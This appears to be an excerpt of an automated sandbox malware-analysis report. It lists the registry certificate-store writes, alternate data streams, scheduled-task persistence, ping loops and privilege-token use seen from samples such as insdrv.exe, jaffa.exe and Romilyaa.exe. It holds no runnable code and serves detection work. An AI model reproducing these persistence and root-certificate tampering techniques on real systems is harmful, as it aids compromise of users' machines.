\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 insdrv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a insdrv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A psiphon-tunnel-core.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 psiphon-tunnel-core.exe Set value (data) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\SystemCertificates\ADDRESSBOOK\Certificates\0789B35FD5C2EF8142E6AAE3B58FFF14E4F13136\Blob = 0300000001000000140000000789b35fd5c2ef8142e6aae3b58fff14e4f13136180000000100000010000000021dfb9b16b1303a97b0bf78cda68e46190000000100000010000000d2ad89d215fd92fee49a4c3941f6764a140000000100000014000000932ca752938ca1308712e92885d692a8c4ba68510f00000001000000200000004d0948e616196706e4aed75a88243863a88ff351afc50d0f9e948353618c011e040000000100000010000000a58d756a52cdd9c0488b755d46d4df71200000000100000026050000308205223082040aa00302010202100aa099e64e214d655801ea38ad876711300d06092a864886f70d01010b05003072310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3131302f0603550403132844696769436572742053484132204173737572656420494420436f6465205369676e696e67204341301e170d3230303931303030303030305a170d3233313130323132303030305a305f310b30090603550406130243413110300e060355040813074f6e746172696f3110300e06035504071307546f726f6e746f31153013060355040a130c50736970686f6e20496e632e311530130603550403130c50736970686f6e20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a2903fcbeb078b484066cdac20fed2173f0d1e3651bc3f78c0b89cd9ad1d36ca07291b60264e08bbdc3f3a7c6391a55e806e96d00c6e476d096476aa6e99f841861e81799cb12ddd0f05ab79f7f4aa3796bdf4ce65897824d533fe733c36356c763139392bfa40699af1bd824a97e12ce1375931833eeecff55bec12762ac8cffd6b4c9c89172fb072fa675aac514f67f71069f11bfa82b344e592669db683eddaa655ab68dd38a01537e4616c96b285fa444ec74cd020479fd423765046fdfff218a63f647a2e0a41f1af02341143e26ea3805248675153539361a22022e96acb6f9a8bd1cc46050fc582f6aef5f03515a081d86107e0203e2f3fa403a8cef90203010001a38201c5308201c1301f0603551d230418301680145ac4b97b2a0aa3a5ea7103c060f92df665750e58301d0603551d0e04160414932ca752938ca1308712e92885d692a8c4ba6851300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330770603551d1f0470306e3035a033a031862f687474703a2f2f63726c332e64696769636572742e636f6d2f736861322d617373757265642d63732d67312e63726c3035a033a031862f687474703a2f2f63726c342e64696769636572742e636f6d2f736861322d617373757265642d63732d67312e63726c304c0603551d2004453043303706096086480186fd6c0301302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533008060667810c01040130818406082b0601050507010104783076302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304e06082b060105050730028642687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727453484132417373757265644944436f64655369676e696e6743412e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101005dd2a32986111896351096581a68ca1073d27ac2c6f78d4b371457e616d7e7ee131828e23f0cc54b9e45fb53691a0687abcf4b642eff06628b340dd01e7d3718db0627e143fb1734f965e35857e4994f25c2d60dd92a263a4956cb14c3c105c32631abb2350156b2411fef84ac8125a94e41b6433d3b4e6d6b470e5b84ea91d4cffbf58eb7ad67b77fdc8289b8ca044a4375a32982ef1db8ee7b0067fdf616a9c383a57d67d72affb98b250a35d146be0cffcf248c11aad7c20c67dc1bd7eb5abad226918bf10c58189530408f52107e4c3715ae9ef42d0e88c8948ad2b35e1875841b979e40469d22d2be0df095dfd4be037ae5d46b340c6e8e6fa35f6c4a28 rundll32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 insdrv.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\SystemCertificates\REQUEST rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\SystemCertificates\ADDRESSBOOK\Certificates\0789B35FD5C2EF8142E6AAE3B58FFF14E4F13136 rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 insdrv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 insdrv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 insdrv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a insdrv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 psiphon-tunnel-core.exe -
NTFS ADS 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\phishing.url:favicon IEXPLORE.EXE File created C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe:ZoneIdentifier notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 17 IoCs
pid Process 2220 PING.EXE 3348 PING.EXE 400 PING.EXE 940 PING.EXE 1492 PING.EXE 1776 PING.EXE 2764 PING.EXE 1520 PING.EXE 3844 PING.EXE 3488 PING.EXE 3240 PING.EXE 1840 PING.EXE 4080 PING.EXE 3196 PING.EXE 2276 PING.EXE 2072 PING.EXE 2688 PING.EXE -
Runs regedit.exe 1 IoCs
pid Process 2832 regedit.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3636 schtasks.exe 4056 schtasks.exe 2052 schtasks.exe 1480 schtasks.exe 868 schtasks.exe 2600 schtasks.exe 3632 schtasks.exe 3236 schtasks.exe 1740 schtasks.exe 3260 schtasks.exe 2824 schtasks.exe 380 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 2656 vlc.exe 1192 WINWORD.EXE 3636 sjhkhda.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2056 WinaeroTweaker-1.40.0.0-setup.tmp 2056 WinaeroTweaker-1.40.0.0-setup.tmp 2828 powershell.exe 2860 iexplore.exe 2860 iexplore.exe 2860 iexplore.exe 2860 iexplore.exe 2860 iexplore.exe 2860 iexplore.exe 2860 iexplore.exe 2860 iexplore.exe 2860 iexplore.exe 2860 iexplore.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 1908 jkka.exe 1908 jkka.exe 1908 jkka.exe 1908 jkka.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 988 sjhkhda.exe 988 sjhkhda.exe 988 sjhkhda.exe 988 sjhkhda.exe 3480 dxwbwewlne.exe 3480 dxwbwewlne.exe 3480 dxwbwewlne.exe 3480 dxwbwewlne.exe 3480 dxwbwewlne.exe 3480 dxwbwewlne.exe 3480 dxwbwewlne.exe 3480 dxwbwewlne.exe 3480 dxwbwewlne.exe 3480 dxwbwewlne.exe 3480 dxwbwewlne.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
pid Process 3276 ac3.exe 2656 vlc.exe 1856 !FIXInj.exe 2132 Rover.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 988 sjhkhda.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2992 tasklist.exe Token: SeDebugPrivilege 2400 taskkill.exe Token: SeDebugPrivilege 2132 Rover.exe Token: SeDebugPrivilege 2276 taskkill.exe Token: SeDebugPrivilege 2072 taskkill.exe Token: SeDebugPrivilege 2236 taskkill.exe Token: SeDebugPrivilege 2884 scary.exe Token: SeDebugPrivilege 1692 Romilyaa.exe Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 1836 Romilyaa.exe Token: SeRestorePrivilege 3848 insdrv.exe Token: SeRestorePrivilege 3848 insdrv.exe Token: SeRestorePrivilege 3848 insdrv.exe Token: SeRestorePrivilege 3848 insdrv.exe Token: SeRestorePrivilege 3848 insdrv.exe Token: SeRestorePrivilege 3848 insdrv.exe Token: SeRestorePrivilege 3848 insdrv.exe Token: SeDebugPrivilege 2916 Romilyaa.exe Token: SeRestorePrivilege 3848 insdrv.exe Token: SeRestorePrivilege 3848 insdrv.exe Token: SeRestorePrivilege 3848 insdrv.exe Token: SeRestorePrivilege 3848 insdrv.exe Token: SeRestorePrivilege 3848 insdrv.exe Token: SeRestorePrivilege 3848 insdrv.exe Token: SeRestorePrivilege 3848 insdrv.exe Token: SeRestorePrivilege 2732 DrvInst.exe Token: SeRestorePrivilege 2732 DrvInst.exe Token: SeRestorePrivilege 2732 DrvInst.exe Token: SeRestorePrivilege 2732 DrvInst.exe Token: SeRestorePrivilege 2732 DrvInst.exe Token: SeRestorePrivilege 2732 DrvInst.exe Token: SeRestorePrivilege 2732 DrvInst.exe Token: SeRestorePrivilege 2732 DrvInst.exe Token: SeRestorePrivilege 2732 DrvInst.exe Token: SeRestorePrivilege 2732 DrvInst.exe Token: SeRestorePrivilege 2732 DrvInst.exe Token: SeRestorePrivilege 2732 DrvInst.exe Token: SeRestorePrivilege 2732 DrvInst.exe Token: SeRestorePrivilege 2732 DrvInst.exe Token: SeRestorePrivilege 3428 rundll32.exe Token: SeRestorePrivilege 3428 rundll32.exe Token: SeRestorePrivilege 3428 rundll32.exe Token: SeRestorePrivilege 3428 rundll32.exe Token: SeRestorePrivilege 3428 rundll32.exe Token: SeRestorePrivilege 3428 rundll32.exe Token: SeRestorePrivilege 3428 rundll32.exe Token: SeBackupPrivilege 2160 vssvc.exe Token: SeRestorePrivilege 2160 vssvc.exe Token: SeAuditPrivilege 2160 vssvc.exe Token: SeBackupPrivilege 2732 DrvInst.exe Token: SeRestorePrivilege 2732 DrvInst.exe Token: SeRestorePrivilege 3848 insdrv.exe Token: SeLoadDriverPrivilege 3848 insdrv.exe Token: SeRestorePrivilege 2076 DrvInst.exe Token: SeRestorePrivilege 2076 DrvInst.exe Token: SeRestorePrivilege 2076 DrvInst.exe Token: SeRestorePrivilege 2076 DrvInst.exe Token: SeRestorePrivilege 2076 DrvInst.exe Token: SeRestorePrivilege 2076 DrvInst.exe Token: SeRestorePrivilege 2076 DrvInst.exe Token: SeRestorePrivilege 2076 DrvInst.exe Token: SeRestorePrivilege 2076 DrvInst.exe Token: SeRestorePrivilege 2076 DrvInst.exe Token: SeLoadDriverPrivilege 2076 DrvInst.exe -
Suspicious use of FindShellTrayWindow 58 IoCs
pid Process 2548 iexplore.exe 2540 efsui.exe 2540 efsui.exe 2540 efsui.exe 2860 iexplore.exe 2056 WinaeroTweaker-1.40.0.0-setup.tmp 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2860 iexplore.exe 1692 Romilyaa.exe 1836 Romilyaa.exe 2916 Romilyaa.exe 2908 Romilyaa.exe 2404 Romilyaa.exe 2580 Romilyaa.exe 2392 Romilyaa.exe 2656 vlc.exe 2656 vlc.exe 2656 vlc.exe 2156 Romilyaa.exe 3196 Romilyaa.exe 2588 f3cb220f1aaa32ca310586e5f62dcab1.exe 2588 f3cb220f1aaa32ca310586e5f62dcab1.exe 2588 f3cb220f1aaa32ca310586e5f62dcab1.exe 2064 Romilyaa.exe 1104 Romilyaa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 3480 dxwbwewlne.exe 3708 zyrnalmo.exe 3480 dxwbwewlne.exe 3332 yjpiisywuzrev.exe 1872 eususxtzrybfydh.exe 3708 zyrnalmo.exe 3480 dxwbwewlne.exe 3332 yjpiisywuzrev.exe 3708 zyrnalmo.exe 3332 yjpiisywuzrev.exe 1872 eususxtzrybfydh.exe 1872 eususxtzrybfydh.exe 1376 zyrnalmo.exe 1376 zyrnalmo.exe 1376 zyrnalmo.exe 2860 iexplore.exe 2860 iexplore.exe -
